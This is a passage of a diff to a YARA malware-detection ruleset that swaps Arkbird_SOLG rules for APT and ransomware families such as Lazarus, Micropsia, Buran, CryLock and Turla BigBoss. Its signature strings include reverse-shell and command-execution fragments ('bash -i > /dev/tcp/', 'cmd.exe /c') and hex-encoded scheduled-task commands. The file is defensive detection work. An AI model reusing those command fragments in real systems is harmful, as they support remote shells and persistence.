2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a } condition: - uint16(0)==0x5a4d and filesize >200KB and 1 of ($seq*) and 4 of ($s*) + uint16(0)==0x5A4D and filesize >30KB and 4 of ($s*) } -import "pe" +rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE +{ + meta: + description = "Detect Micropsia used by APT-C-23 (Build 2018)" + author = "Arkbird_SOLG" + id = "517a33bb-0214-588f-80e4-dc82f2552330" + date = "2021-03-31" + modified = "2021-03-31" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24" + license_url = "N/A" + logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef" + score = 50 + quality = 69 + tags = "FILE" + hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60" + level = "experimental" -rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE + strings: + $code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff } + $code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 } + $code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb } + $s1 = "szhttpUserAgent" fullword ascii + $s2 = "httpUseragent" fullword ascii + $s3 = "dwByteRead" fullword ascii + $s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 } + $s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 } + $s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b } + $s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 } + $s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a } + + condition: + uint16(0)==0x5a4d and filesize >50KB and 2 of ($code*) and 5 of ($s*) +} +rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE { meta: - description = "Detect loader malware used by APT Donot for drops the final stage" + description = "Detect Micropsia used by APT-C-23 (Build 2020)" author = "Arkbird_SOLG" - id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b" - date = "2020-06-22" - modified = "2020-06-22" - reference = "https://twitter.com/ccxsaber/status/1274978583463649281" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22" + id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e" + date = "2021-03-31" + modified = "2021-03-31" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26" license_url = "N/A" - logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734" - score = 75 + logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9" + score = 50 quality = 75 tags = "FILE" - hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b" + hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237" + hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666" + level = "experimental" strings: - $s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii - $s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii - $s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii - $s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii - $s5 = "0$0h4h5l5p5t5x5|5" fullword ascii - $s6 = "?&?+?1?7?M?T?g?z?" fullword ascii - $s7 = "12.02.1245" fullword ascii - $s8 = ">>?C?L?[?~?" fullword ascii - $s9 = "6*6=6P6b6" fullword ascii + $code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 } + $code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc } + $code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 } + $s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 } + $s2 = "Download start ." fullword wide + $s3 = "application/x-msdownload" fullword wide + $s4 = "Start Download File" fullword wide + $s5 = "getHttpDownload" fullword ascii + $s6 = "Download start ." fullword wide + $s7 = "-start" fullword wide + $s8 = "-Winapi.ImageHlp" fullword ascii + $s9 = "postHttpDownload" fullword ascii condition: - uint16(0)==0x5a4d and filesize <30KB and 7 of them + uint16(0)==0x5a4d and filesize >50KB and 2 of ($code*) and 5 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE +rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE { meta: - description = "Detect DACLS malware used by APT Lazarus" + description = "Detect Buran ransomware" author = "Arkbird_SOLG" - id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7" - date = "2020-06-11" - modified = "2020-06-12" - reference = "https://twitter.com/batrix20/status/1270924079826997248" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26" + id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c" + date = "2020-11-05" + modified = "2020-11-06" + reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22" license_url = "N/A" - logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b" + logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a" score = 75 - quality = 48 + quality = 75 tags = "FILE" - hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b" + hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af" + hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb" + hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6" + hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5" + hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb" + hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8" strings: - $s1 = "bash -i > /dev/tcp/" fullword ascii - $s2 = "__mh_execute_header" fullword ascii - $s3 = "/bin/bash -c \"" fullword ascii - $s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii - $s5 = "@_gethostbyname" fullword ascii - $s6 = "@_gethostname" fullword ascii - $s7 = "radr://5614542" fullword ascii - $s8 = "sh -c \"" fullword ascii - $s9 = "content-type: multipart/form-data" fullword ascii - $s10 = "@___stack_chk_fail" fullword ascii - $s11 = "/usr/lib/libSystem.B.dylib" fullword ascii - $s12 = "@dyld_stub_binder" fullword ascii + $s1 = "!!! LOCALPUBKEY !!!" fullword ascii + $s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii + $s3 = "!!! D !!!" fullword ascii + $s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 } + $s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii + $s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii condition: - uint16(0)==0xfacf and filesize <200KB and 10 of them + uint16(0)==0x5a4d and filesize >100KB and 4 of them } -import "pe" +rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE +{ + meta: + description = "Detect CryLock ransomware V2.0.0" + author = "Arkbird_SOLG" + id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0" + date = "2020-10-14" + modified = "2020-10-15" + reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31" + license_url = "N/A" + logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230" + score = 75 + quality = 71 + tags = "FILE" + hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831" -rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE + strings: + $s1 = "All commands sended to execution" fullword ascii + $s2 = "Processesblacklist1" fullword ascii + $s3 = "Execute all" fullword ascii + $s4 = "config.txt" fullword ascii + $debug1 = "Processed files: " fullword ascii + $debug2 = "Next -->" fullword ascii + $debug3 = "Status: scan network" fullword ascii + $debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 } + $debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 } + $debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 } + $ran1 = "w_to_decrypt.hta" wide + $ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii + $ran3 = "<%START_DATETIME%>" fullword ascii + $ran4 = "<%MAIN_CONTACT%>" fullword ascii + $ran5 = "<%RESERVE_CONTACT%>" fullword ascii + $ran6 = "<%HID%>" fullword ascii + + condition: + uint16(0)==0x5a4d and filesize >300KB and 3 of ($s*) and 4 of ($debug*) and 4 of ($ran*) +} +rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE { meta: - description = "Detect NukeSped malware used by APT Lazarus" + description = "Detect MATRIX ransomware" author = "Arkbird_SOLG" - id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c" - date = "2020-06-11" - modified = "2020-06-12" - reference = "https://twitter.com/batrix20/status/1270924079826997248" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54" + id = "a7df188c-e381-55e6-97e6-45f5830ff0d3" + date = "2020-10-15" + modified = "2020-10-15" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28" license_url = "N/A" - logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae" + logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3" score = 75 quality = 75 tags = "FILE" - hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b" + hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf" + hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40" + hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829" + hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6" strings: - $s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide - $s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii - $s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii - $s4 = "Content-Type: multipart/form-data; boundary=" fullword wide - $s5 = "POST" fullword ascii - $s6 = "Content-Type: octet-stream" fullword ascii - $s7 = "CONOUT$" fullword ascii - $s8 = "cmd.exe /c" fullword ascii - $s9 = "2>&1" fullword ascii - $s10 = "WINHTTP.dll" fullword ascii - $s11 = "WinHttpSendRequest" fullword wide - $s12 = "ObtainUserAgentString" fullword ascii - $s13 = "WS2_32.dll" fullword ascii - $s14 = "WinHttpReceiveResponse" fullword ascii - $s15 = "GetLogicalDrives" fullword ascii + $debug1 = "[LDRIVES]: not found!" fullword wide + $debug2 = "[DONE]: NO_SHARES!" fullword wide + $debug3 = "[ALL_LOCAL_KID]: " fullword wide + $debug4 = "[FINISHED]: G=" fullword wide + $debug5 = "[FEX_START]" fullword wide + $debug6 = "[LOGSAVED]" fullword wide + $debug7 = "[GENKEY]" fullword wide + $debug8 = "[SHARES]" fullword wide + $debug9 = "[SHARESSCAN]: " fullword wide + $reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d } + $reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d } + $reg3 = { 26 00 73 00 69 00 64 00 3d 00 } + $reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d } + $reg5 = { 47 00 45 00 54 } condition: - uint16(0)==0x5a4d and filesize <100KB and (pe.imphash()=="c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them ) + uint16(0)==0x5a4d and filesize >500KB and 4 of ($debug*) and 3 of ($reg*) } -rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE { meta: - description = "Detect Installer from BabyElephant APT" + description = "Detects new BigBoss implants (SilentMoon/GoldenSky)" author = "Arkbird_SOLG" - id = "c89a127d-af49-597e-927d-c9a10c90fabe" - date = "2021-02-23" - modified = "2021-02-23" - reference = "https://twitter.com/h2jazi/status/1363683531067715584" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21" + id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be" + date = "2021-04-06" + modified = "2021-07-17" + reference = "https://twitter.com/DrunkBinary/status/1304086230540390400" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9" - score = 50 - quality = 73 + logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998" + score = 75 + quality = 71 tags = "FILE" - level = "experimental" - hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e" + hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd" + hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb" + hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a" strings: - $s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c } - $s2 = "COMSPEC" fullword ascii - $s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 } - $s4 = "%s//%s" fullword ascii - $s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 } - $s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec } - $s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 } + $s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 } + $s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c } + $s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 } + $s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 } + $s5 = "%d blocks, %d sorted, %d scanned" ascii fullword + $s6 = "REMOTE_NS:ERROR:%d" ascii fullword + $s7 = { 5c 5c 25 73 5c 69 70 63 24 } + $s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 